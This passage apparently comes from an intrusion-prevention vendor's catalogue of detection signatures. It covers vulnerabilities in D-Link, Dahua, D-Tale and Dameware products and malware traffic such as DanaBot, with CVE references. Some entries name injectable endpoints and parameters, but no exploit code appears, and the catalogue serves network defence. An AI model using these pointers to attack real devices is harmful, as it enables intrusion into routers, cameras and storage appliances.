About this vulnerability: An attempt to exploit a vulnerability in a D-Link DIR-2640 device detected
Risk: High
First detected in: sgpkg-ips-1645-5242
Last changed: sgpkg-ips-1645-5242
Platform: Generic
Software: D-Link Systems DIR-2640
Type: Input Validation
Description: A vulnerability in D-Link DIR-2640 devices prior to v1.11B02_Beta_Hotfix, which allows remote attackers to execute arbitrary commands by sending malicious POST requests to /HNAP1/, due to insufficient validation of the <EmailFrom> parameter.
Situation: HTTP_CRL-D-Link-DIR-2640-HNAP-EmailFrom-Command-Injection-Vulnerability
References:
CVE-2023-32153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32153
Back to top

D-Link-Dir-2640-HNAP-Loginpassword-Authentication-Bypass-Vulnerability

About this vulnerability: A vulnerability in D-Link Systems DIR-2640
Risk: High
First detected in: sgpkg-ips-1612-5242
Last changed: sgpkg-ips-1612-5242
Platform: Generic
Software: D-Link Systems DIR-2640
Type: Malfunction
Description: Improper handling of incoming HNAP login requests causes an authentication bypass vulnerability in D-Link DIR-2640. A successful exploit allows an attacker log in to a vulnerable system.
Situation: File-TextId_D-Link-Dir-2640-HNAP-Loginpassword-Authentication-Bypass-Vulnerability
References:
CVE-2023-32152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32152
Back to top

D-Link-Dir-2640-HNAP-Prefixlen-Command-Injection-Vulnerability

About this vulnerability: A vulnerability in D-Link Systems DIR-2640
Risk: High
First detected in: sgpkg-ips-1627-5242
Last changed: sgpkg-ips-1627-5242
Platform: Generic
Software: D-Link Systems DIR-2640
Type: Input Validation
Description: A command injection vulnerability exists in D-Link DIR-2640 devices. The vulnerability is due to improper operation on incoming HNAP requests. A remote attacker can exploit the vulnerabilities by sending malicious requests to the vulnerable device. Successfully exploiting these vulnerabilities could result in command execution under the security context of root.
Situation: File-TextId_D-Link-Dir-2640-HNAP-Prefixlen-Command-Injection-Vulnerability
References:
CVE-2023-32150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32150
Back to top

D-Link-Dir-2640-HNAP-Privatelogin-Authentication-Bypass-Vulnerability

About this vulnerability: A vulnerability in D-Link Systems DIR-2640
Risk: High
First detected in: sgpkg-ips-1616-5242
Last changed: sgpkg-ips-1616-5242
Platform: Generic
Software: D-Link Systems DIR-2640
Type: Malfunction
Description: An authentication bypass vulnerability exists in D-Link DIR-2640 devices. The vulnerability is due to improper operation on incoming HNAP login requests. A remote attacker can exploit the vulnerabilities by sending malicious requests to the vulnerable device. Successfully exploiting these vulnerabilities could allow an attacker to log in as an authenticated user.
Situation: File-TextId_D-Link-Dir-2640-HNAP-Privatelogin-Authentication-Bypass-Vulnerability
References:
CVE-2023-32148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32148
Back to top

D-Link-Dir-605-Information-Disclosure-CVE-2021-40655

About this vulnerability: A vulnerability in D-Link DIR-605
Risk: High
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1729-5242
Platform: Generic
Software: D-Link
Type: Malfunction
Description: An information disclosure vulnerability has been reported in the firmware version 2.01MT of the D-Link DIR-605 routers. A remote, unauthenticated attacker can use this vulnerability to obtain valid user credentials via a forged HTTP request.
Situation: HTTP_CRL-D-Link-Dir-605-Information-Disclosure-CVE-2021-40655
References:
CVE-2021-40655
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40655
Back to top

D-Link-DIR-615-Authentication-Bypass

About this vulnerability: A vulnerability in D-Link DIR-615 router
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: D-Link DIR-615
Type: Malfunction
Description: There is an authentication bypass vulnerability in D-Link Wireless N Router DIR-615 which alllows remote attackers to reset the router's admin password.
Situation: HTTP_CRL-D-Link-DIR-615-Authentication-Bypass
References:
CVE-2009-4821
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4821
BID-37415
http://www.securityfocus.com/bid/37415
Back to top

D-Link-DIR-615-Buffer-Overflow-CVE-2018-15839

About this vulnerability: A vulnerability in D-Link DIR-615
Risk: High
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: D-Link DIR-615
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in D-Link DIR-615 devices. An unauthenticated attacker can exploit this by sending a crafted HTTP request that contains an overly long Authorization header or SessionID cookie value.
Situation: HTTP_CSH-Excessively-Long-Basic-Authorization-Header
HTTP_CSH-D-Link-DIR-615-Buffer-Overflow-CVE-2018-15839
References:
CVE-2018-15839
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15839
Back to top

D-Link-DIR-806-HNAP-SOAPAction-Header-Command-Execution-CVE-2019-10891

About this vulnerability: An attempt to exploit a vulnerability in D-Link detected
Risk: High
First detected in: sgpkg-ips-1818-5242
Last changed: sgpkg-ips-1818-5242
Platform: Generic
Software: D-Link
Type: Input Validation
Description: An issue was discovered in D-Link DIR-806 devices. There is a command injection in function "hnap_main", which calls system() without checking the parameter that can be controlled by user, and finally allows remote attackers to execute arbitrary shell commands with a special HTTP header.
Situation: HTTP_CSH-D-Link-HNAP-SOAPAction-Header-Command-Execution
References:
CVE-2019-10891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10891
Back to top

D-Link-DIR-809-Devices-Buffer-Overflow

About this vulnerability: A vulnerability in D-Link DIR-809 devices
Risk: High
First detected in: sgpkg-ips-1421-5242
Last changed: sgpkg-ips-1421-5242
Platform: Generic
Software: D-Link DIR-809
Type: Buffer Overflow
Description: D-Link DIR-809 devices with firmware through DIR-809Ax_FW1.12WWB03_20190410 were discovered to contain a stack buffer overflow vulnerability in the function FUN_80040af8 in /formWlanSetup. This vulnerability is triggered via a crafted POST request.
Situation: HTTP_CS-D-Link-DIR-809-Devices-Buffer-Overflow
References:
CVE-2021-33274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33274
Back to top

D-Link-DIR-816L-Getcfg.php-Information-Disclosure

About this vulnerability: A vulnerability in D-Link DIR-816L
Risk: Moderate
First detected in: sgpkg-ips-1379-5242
Last changed: sgpkg-ips-1379-5242
Platform: Generic
Software: D-Link
Type: Code Injection
Description: An information disclosure vulnerability has been reported in D-Link DIR-816L devices. A remote, unauthenticated attacker could use this vulnerability to gain sensitive information, such as admin credentials. This situation also covers CVE-2020-9376.
Situation: HTTP_CRL-D-Link-DIR-816L-Getcfg.php-Information-Disclosure
References:
CVE-2020-15894
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15894
Back to top

D-Link-DIR-820L-Remote-Code-Execution-Vulnerability-CVE-2022-26258

About this vulnerability: An attempt to exploit a vulnerability in D-Link DIR-820L detected
Risk: High
First detected in: sgpkg-ips-1589-5242
Last changed: sgpkg-ips-1589-5242
Platform: Generic
Software: D-Link DIR-820L
Type: Input Validation
Description: D-Link DIR-820L 1.05B03 was discovered to contain remote command execution (RCE) vulnerability via HTTP POST to get set ccp. It is in the handler of route /lan.asp, in which the value of parameter "Device Name" can be injected with malicious commands.
Situation: HTTP_CRL-D-Link-DIR-820L-Remote-Code-Execution-Vulnerability-CVE-2022-26258
References:
CVE-2022-26258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26258
Back to top

D-Link-DIR-820L-Remote-Code-Execution-Vulnerability-CVE-2023-25280

About this vulnerability: An attempt to exploit a vulnerability in D-Link DIR-820L detected
Risk: High
First detected in: sgpkg-ips-1786-5242
Last changed: sgpkg-ips-1786-5242
Platform: Generic
Software: D-Link DIR-820L
Type: Input Validation
Description: D-Link DIR820LA1 routers with the firmware version FW105B03 are affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without authentication.
Situation: HTTP_CRL-D-Link-TRENDnet-NCC-Service-Command-Injection
References:
CVE-2023-25280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25280
Back to top

D-Link-DIR-825-Buffer-Overflow-CVE-2020-29557

About this vulnerability: A vulnerability in D-Link DIR-825 routers
Risk: High
First detected in: sgpkg-ips-1403-5242
Last changed: sgpkg-ips-1403-5242
Platform: Generic
Software: D-Link
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in D-Link DIR-825 routers. A successful exploitation of this vulnerability can allow remote attackers to create a denial of service condition or execute arbitrary code by sending a crafted HTTP request.
Situation: HTTP_CSU-D-Link-DIR-825-Buffer-Overflow-CVE-2020-29557
References:
CVE-2020-29557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29557
Back to top

D-Link-DIR-845-HNAP-SOAPAction-Header-Command-Execution-CVE-2024-33112

About this vulnerability: An attempt to exploit a vulnerability in D-Link detected
Risk: High
First detected in: sgpkg-ips-1818-5242
Last changed: sgpkg-ips-1818-5242
Platform: Generic
Software: D-Link
Type: Input Validation
Description: D-Link DIR-845L devices v1.01KRb03 and before are vulnerable to command injection via the "hnap_main" function.
Situation: HTTP_CSH-D-Link-HNAP-SOAPAction-Header-Command-Execution
References:
CVE-2024-33112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33112
Back to top

D-Link-DIR-850L-Command-Execution

About this vulnerability: A D-Link DIR-850L Command Execution vulnerability
Risk: High
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: D-Link
Type: Input Validation
Description: A vulnerability in DLin DIR-850L routers that allows remote attackers to execute arbitrary commands.
Situation: HTTP_CRL-D-Link-DIR-850L-Command-Execution
Back to top

D-Link-DIR-859-Gena.cgi-Remote-Command-Execution

About this vulnerability: A vulnerability in D-Link DIR-859 routers
Risk: High
First detected in: sgpkg-ips-1219-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: D-Link
Type: Input Validation
Description: There exists a vulnerability in D-Link DIR-859 Routers which allows remote attackers to execute arbitrary code through gena.cgi in the service parameter, due to insufficient user input validation.
Situation: HTTP_CS-D-Link-DIR-859-Gena.cgi-Remote-Command-Execution
References:
CVE-2019-17621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17621
Back to top

D-Link-DIR-859-Path-Traversal-CVE-2024-0769

About this vulnerability: A vulnerability in D-Link DIR-859
Risk: High
First detected in: sgpkg-ips-1748-5242
Last changed: sgpkg-ips-1748-5242
Platform: Generic
Software: D-Link
Type: Directory Traversal
Description: A path traversal vulnerability exists in the firmware of the D-Link DIR-859 wireless routers. A remote, unauthenticated attacker can leverage this vulnerability to obtain information such as usernames and passwords, allowing for a complete takeover of the device.
Situation: HTTP_CRL-D-Link-DIR-859-Path-Traversal-CVE-2024-0769
References:
CVE-2024-0769
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0769
Back to top

D-Link-Dir-X4860-HNAP-LocalIPAddress-Command-Injection

About this vulnerability: A vulnerability in D-Link DIR-X4860 routers
Risk: High
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Platform: Generic
Software: D-Link
Type: Input Validation
Description: A command injection vulnerability has been reported in D-Link DIR-X4860 routers due to the insufficient sanitization of the user-supplied LocalIPAddress XML element value.
Situation: File-TextId_D-Link-Dir-X4860-HNAP-LocalIPAddress-Command-Injection
Back to top

D-Link-DIR816L-Moobot-Remote-Code-Execution-Attempt

About this vulnerability: A vulnerability in D-Link DIR816L
Risk: High
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1535-5242
Platform: Generic
Software: D-Link
Type: Input Validation
Description: A remote code execution vulnerability CVE-2022-28958 was reported in the D-Link DIR816L router firmware. The lack of user input validation of the value parameter was claimed to allow for arbitrary code execution.
Situation: HTTP_CRL-D-Link-DIR816L-Moobot-Remote-Code-Execution-Attempt
References:
CVE-2022-28958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28958
Back to top

D-Link-DNS-320-Remote-Code-Execution-CVE-2020-25506

About this vulnerability: A vulnerability in D-Link DNS-320
Risk: High
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Platform: Generic
Software: D-Link
Type: Code Injection
Description: A command injection vulnerability exists in D-Link DNS-320. This vulnerability can allow unauthenticated attackers to execute arbitrary code via the f_ntp_server parameter.
Situation: HTTP_CRL-D-Link-DNS-320-Remote-Code-Execution-CVE-2020-25506
References:
CVE-2020-25506
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25506
Back to top

D-Link-DNS-320-ShareCenter-Remote-Code-Execution

About this vulnerability: A vulnerability in D-Link DNS-320 ShareCenter
Risk: High
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Platform: Generic
Software: D-Link DNS-320 ShareCenter
Type: Code Injection
Description: There is a vulnerability in D-Link DNS-320 ShareCenter which may allow remote attackers to execute arbitrary code without authentication.
Situation: HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Code-Execution
References:
CVE-2019-16057
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16057
Back to top

D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service

About this vulnerability: A vulnerability in D-Link DNS-320 ShareCenter
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: D-Link DNS-320 ShareCenter
Type: Malfunction
Description: There is a vulnerability in D-Link DNS-320 ShareCenter which allows remote attackers to reboot/reset/shutdown the device without authentication.
Situation: HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service-4
HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service-3
HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service-2
HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service
References:
BID-50902
http://www.securityfocus.com/bid/50902
Back to top

D-Link-DnsProxy-Cross-Site-Scripting

About this vulnerability: A vulnerability in D-Link DnsProxy
Risk: Moderate
First detected in: sgpkg-ips-714-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: D-Link DnsProxy
Type: Cross-site Scripting
Description: There is a cross-site scripting vulnerability in D-Link DnsProxy.
Situation: HTTP_CRL-D-Link-DnsProxy-Cross-Site-Scripting
References:
CVE-2015-1028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1028
BID-72725
http://www.securityfocus.com/bid/72725
OSVDB-117573
http://www.osvdb.org/117573
Back to top

D-Link-DSL-2750B-Command-Injection

About this vulnerability: A vulnerability in D-Link DSL-2750B
Risk: High
First detected in: sgpkg-ips-1542-5242
Last changed: sgpkg-ips-1542-5242
Platform: Generic
Software: D-Link
Type: Input Validation
Description: A command injection vulnerability has been reported in the firmware of D-Link DSL-2750B wireless routers. An unauthenticated attacker could use this vulnerability to execute arbitrary commands via the login.cgi cli parameter value.
Situation: HTTP_CSU-D-Link-DSL-2750B-Command-Injection
References:
CVE-2016-20017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-20017
Back to top

D-Link-DSL-2760U-Cross-Site-Scripting

About this vulnerability: A vulnerability in D-Link 2760U
Risk: High
First detected in: sgpkg-ips-1594-5242
Last changed: sgpkg-ips-1594-5242
Platform: Generic
Software: D-Link
Type: Input Validation
Description: Multiple cross-site scripting vulnerabilities have been reported in the web UI of the D-Link DSL-2760U routers.
Situation: HTTP_CRL-D-Link-DSL-2760U-Cross-Site-Scripting
References:
CVE-2013-5223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5223
Back to top

D-Link-DSR-250N-Denial-of-Service

About this vulnerability: A vulnerability in D-Link DSR-250N
Risk: High
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Platform: Generic
Software: D-Link DSR-250N
Type: Insecure Configuration
Description: There exists a vulnerability in D-Link DSR-250N, firmware version 3.12, which allows remote attackers to create a denial of service condition by sending a request to upgradeStatusReboot.cgi due to the lack of authentication.
Situation: HTTP_CSU-D-Link-DSR-250N-Denial-of-Service
References:
CVE-2020-26567
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26567
Back to top

D-Link-DWL-2600AP-Command-Injection-CVE-2019-20500

About this vulnerability: A vulnerability in D-Link DWL-2600AP
Risk: High
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: DLINK DWL-2600
Type: Input Validation
Description: A command injection vulnerability has been reported in D-Link DWL-2600AP devices (firmware version 4.2.0.15 Rev A). An authenticated attacker could use this vulnerability to execute arbitrary OS commands.
Situation: HTTP_CS-D-Link-DWL-2600AP-Command-Injection-CVE-2019-20500
References:
CVE-2019-20500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20500
Back to top

D-Link-GORT-AC750-HNAP-SOAPAction-Header-Command-Execution-CVE-2022-37056

About this vulnerability: An attempt to exploit a vulnerability in D-Link detected
Risk: High
First detected in: sgpkg-ips-1818-5242
Last changed: sgpkg-ips-1818-5242
Platform: Generic
Software: D-Link
Type: Input Validation
Description: D-Link GO-RT-AC750 GORTAC750_revA_v101b03 and GO-RT-AC750_revB_FWv200b02 devices are vulnerable to command injection via the "hnap_main" function.
Situation: HTTP_CSH-D-Link-HNAP-SOAPAction-Header-Command-Execution
References:
CVE-2022-37056
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37056
Back to top

D-Link-Hardcoded-Credentials-CVE-2024-3272

About this vulnerability: A vulnerability D-Link NAS devices
Risk: High
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Platform: Generic
Software: D-Link
Type: Backdoor
Description: A command injection vulnerability together with publicly known hardcoded credentials in nas_sharing.cgi of various out-of-support D-Link NAS devices may allow for unauthenticated command execution.
Situation: HTTP_CSU-D-Link-Hardcoded-Credentials-CVE-2024-3272
References:
CVE-2024-3272
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3272
Back to top

D-Link-HNAP-Request-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in D-Link Systems DIR-505
Risk: High
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: D-Link DIR-505; D-Link DIR-505L; D-Link DSP-W215
Type: Buffer Overflow
Description: A remote code execution vulnerability exists in D-Link routers. The vulnerability is due to a stack buffer overflow while processing crafted HTTP POST requests addressed to the HNAP handler. By sending a crafted HTTP request to the target device, a remote unauthenticated attacker can exploit this vulnerability to execute arbitrary code on the affected device with root privileges.
Situation: HTTP_CS-D-Link-HNAP-Request-Stack-Buffer-Overflow
References:
CVE-2014-3936
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3936
BID-67651
http://www.securityfocus.com/bid/67651
OSVDB-107049
http://www.osvdb.org/107049
Back to top

D-Link-HNAP-SOAPAction-Header-Command-Execution

About this vulnerability: An attempt to exploit a vulnerability in a D-Link HNAP SOAPAction header detected.
Risk: High
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: D-Link
Type: Input Validation
Description: A vulnerability in the D-Link GetDeviceSettings functionality of the HNAP server which allows remote attackers to execute code via a crafted SOAPAction header.
Situation: HTTP_CSH-D-Link-HNAP-SOAPAction-Header-Command-Execution
References:
CVE-2015-2051
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2051
Back to top

D-Link-HNAP-SOAPAction-Stack-Overflow

About this vulnerability: A vulnerability in D-Link Wi-Fi router
Risk: High
First detected in: sgpkg-ips-640-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: D-Link
Type: Malfunction
Description: A vulnerability exists in multiple D-Link Wi-Fi routers that allows an attacker to execute arbitrary code on the affected system.
Situation: HTTP_CSH-D-Link-HNAP-SOAPAction-Stack-Overflow
Back to top

D-Link-NAS-Appliance-Command-Injection

About this vulnerability: A vulnerability in multiple D-Link storage appliances
Risk: Moderate
First detected in: sgpkg-ips-1799-5242
Last changed: sgpkg-ips-1799-5242
Platform: Generic
Software: D-Link
Type: Input Validation
Description: Improper request validation causes a command injection vulnerability in multiple D-Link storage appliances.
Situation: HTTP_CRL-D-Link-NAS-Appliance-Command-Injection
References:
CVE-2024-10914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10914
Back to top

D-Link-Router-Directory-Traversal

About this vulnerability: Directory Traversal vulnerability in D-Link routers
Risk: High
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: D-Link
Type: Input Validation
Description: There exists a directory traversal vulnerability in the D-Link router httpd server present in several D-Link routers. The vulnerability allows a full takeover of the router.
Situation: HTTP_CSU-D-Link-Router-Directory-Traversal
References:
CVE-2018-10822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10822
Back to top

D-Link-Router-Password-Recovery

About this vulnerability: D-Link DIR-300 DIR-600 DIR-615 routers Password Recovery
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows;Linux
Software: D-Link
Type: Script Injection
Description: A vulnerability in D-Link DIR-300 DIR-600 DIR-615 routers allowing remote attackers inject specially crafted scripts via a GET request to recover router passwords and compromise the system.
Situation: HTTP_CSU-D-Link-Router-Password-Recovery
Back to top

D-Link-Router-UPnP-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the handling of a long M-SEARCH request in D-Link
Risk: High
First detected in: sgpkg-ips-73-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: D-Link
Type: Buffer Overflow
Description: D-Link has a buffer overflow vulnerability in the handling of a long M-SEARCH request. A successful exploitation of this vulnerability allows a remote attacker to compromise a vulnerable network router.
Situation: Generic_D-Link-Router-UPnP-Buffer-Overflow
References:
CVE-2006-3687
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3687
BID-19006
http://www.securityfocus.com/bid/19006
OSVDB-27333
http://www.osvdb.org/27333
Back to top

D-Link-soap.cgi-Command-Injection-CVE-2018-6530

About this vulnerability: A vulnerability in D-Link
Risk: High
First detected in: sgpkg-ips-1503-5242
Last changed: sgpkg-ips-1503-5242
Platform: Generic
Software: D-Link
Type: Input Validation
Description: A command injection vulnerability has been reported in the firmware of D-Link DIR-880L, DIR-868L, DIR-865L, and DIR-860L routers. An unauthenticated attacker could use this vulnerability to execute arbitrary OS commands via an HTTP request to soap.cgi.
Situation: HTTP_CRL-D-Link-soap.cgi-Command-Injection-CVE-2018-6530
References:
CVE-2018-6530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6530
Back to top

D-Link-TFTP-Server-Buffer-Overflow

About this vulnerability: D-Link TFTP Server 1.0 Buffer Overflow
Risk: High
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: D-Link TFTP
Type: Buffer Overflow
Description: A buffer overflow vulnerability in D-Link TFTP Server 1.0 which allows remote attackers to execute arbitrary code, or cause a denial of service condition, via a long GET or PUT request.
Situation: TFTP_Read-Or-Write-Request-Excessively-Long-Filename
References:
CVE-2007-1435
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1435
BID-22923
http://www.securityfocus.com/bid/22923
OSVDB-33977
http://www.osvdb.org/33977
Back to top

D-Link-TRENDnet-NCC-Service-Command-Injection

About this vulnerability: A D-Link TRENDnet NCC Service Command Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-740-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: D-Link
Type: Malfunction
Description: A vulnerability in multiple versions of D-Link and TRENDnet routers that allows remote attackers to execute arbitrary commands via the ping command.
Situation: HTTP_CRL-D-Link-TRENDnet-NCC-Service-Command-Injection
References:
CVE-2015-1187
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1187
BID-72816
http://www.securityfocus.com/bid/72816
Back to top

D-Link-Unauthenticated-Remote-Command-Execution

About this vulnerability: A D-Link Unauthenticated Remote Command Execution vulnerability
Risk: High
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: D-Link
Type: Input Validation
Description: A vulnerability in D-Link Routers, versions DIR-600 2.14b0 and DIR-300 rev B 2.13, which allows remote attackers to disclose sensitive information and execute arbitrary code through the cmd variable in command.php.
Situation: HTTP_CRL-D-Link-Unauthenticated-Remote-Command-Execution
References:
BID-57734
http://www.securityfocus.com/bid/57734
OSVDB-89861
http://www.osvdb.org/89861
Back to top

D-Link-WBR-1310-Authentication-Bypass

About this vulnerability: A vulnerability in D-Link WBR-1310
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: D-Link WBR-1310
Type: Malfunction
Description: There is an authentication bypass vulnerability in D-Link WBR-1310 wireless routers that can be exploited by remote attackers to change administrative settings of the router without authenticating.
Situation: HTTP_CRL-D-Link-WBR-1310-Authentication-Bypass
References:
BID-45554
http://www.securityfocus.com/bid/45554
Back to top

D-Link-Wireless-Router-Captcha-Data-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in D-Link Systems DIR-605L
Risk: High
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: D-Link DIR-605L
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in the D-Link DIR-605L routers. The vulnerability exists in the processing of the user-supplied CAPTCHA data from the Web-based login page when the CAPTCHA feature is enabled. By sending a crafted HTTP POST request, a remote unauthenticated attacker can exploit this vulnerability to gain root privileges on the target system.
Situation: HTTP_CRL-D-Link-Wireless-Router-Captcha-Data-Processing-Buffer-Overflow
Back to top

D-Tale-RCE

About this vulnerability: A vulnerability in D-Tale
Risk: High
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Platform: Linux
Software: D-Tale
Type: Input Validation
Description: A vulnerability in D-Tale which allows remote attackers to execute arbitrary code via the query parameter, after setting highlightFilter to true, due to insufficient input validation.
Situation: HTTP_CSU-D-Tale-RCE
References:
CVE-2025-0655
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0655
Back to top

Dahua-DVR-Auth-Bypass

About this vulnerability: A Dahua DVR Auth Bypass vulnerability
Risk: High
First detected in: sgpkg-ips-779-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dahua
Type: Insecure Configuration
Description: A vulnerability in Dahua DVR which allows remote attackers to bypass authentication and grabs settings, reset user passwords, and clears the device logs.
Situation: Generic_CS-Dahua-DVR-Auth-Bypass
References:
CVE-2013-6117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6117
Back to top

Dahua-IP-Camera-Loopback-Authentication-Bypass-CVE-2021-33045

About this vulnerability: A vulnerability in Dahua IP camera firmware
Risk: High
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Platform: Generic
Software: Dahua
Type: Malfunction
Description: Dahua IP cameras and video intercom devices with firmware versions released prior to September 2021 are vulnerable to an authentication bypass during the login process.
Situation: HTTP_CRL-Dahua-IP-Camera-Loopback-Authentication-Bypass-CVE-2021-33045
References:
CVE-2021-33045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33045
Back to top

Dahua-IP-Camera-NetKeyboard-Authentication-Bypass-CVE-2021-33044

About this vulnerability: A vulnerability in Dahua IP camera firmware
Risk: High
First detected in: sgpkg-ips-1777-5242
Last changed: sgpkg-ips-1777-5242
Platform: Generic
Software: Dahua
Type: Malfunction
Description: Dahua IP cameras and video intercom devices with firmware versions released prior to September 2021 are vulnerable to an authentication bypass during the login process.
Situation: HTTP_CRL-Dahua-IP-Camera-NetKeyboard-Authentication-Bypass-CVE-2021-33044
References:
CVE-2021-33044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33044
Back to top

Dahua-Username-Password-Disclosure

About this vulnerability: A vulnerability in Dahua cameras
Risk: High
First detected in: sgpkg-ips-1322-5242
Last changed: sgpkg-ips-1322-5242
Platform: Generic
Software: Dahua
Type: Backdoor
Description: There exists a backdoor vulnerability in Dahua cameras, generation 2 versions, which allows remote attackers to gain, and possibly change, username and password data, leading to unauthenticated command execution.
Situation: HTTP_CSU-Dahua-Username-Password-Disclosure
Back to top

Dameware-Mini-Remote-Control-Server-Pre-Authentication-BOF

About this vulnerability: A buffer overflow vulnerability in Dameware Mini Remote Control Server
Risk: Low
First detected in: sgpkg-ips-507-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: DameWare Mini Remote Control
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Dameware Mini Remote Control software. A crafted request with a malicious payload allows a compromise of a system running vulnerable software.
Situation: Generic_CS-Dameware-Mini-Remote-Control-Server-Pre-Authentication-BOF
References:
CVE-2003-1030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1030
BID-14707
http://www.securityfocus.com/bid/14707
Back to top

DanaBot-C2-Traffic

About this vulnerability: DanaBot C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: DanaBot is a banking trojan with web inject and stealer functionalities. It also has a module to support VNC connections.
Situation: Generic_CS-DanaBot-C2-Traffic
Back to top

Danmec

About this vulnerability: DanMec
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: DanMec is a Trojan that opens a backdoor on the infected machine.
Situation: HTTP_CS-Danmec-Traffic
HTTP_CSU-Danmec-Trojan-SQL-Injection-Attack
File-Text_Danmec-Trojan-Download
Back to top

Dapato

About this vulnerability: Dapato
Risk: High
First detected in: sgpkg-ips-619-5211
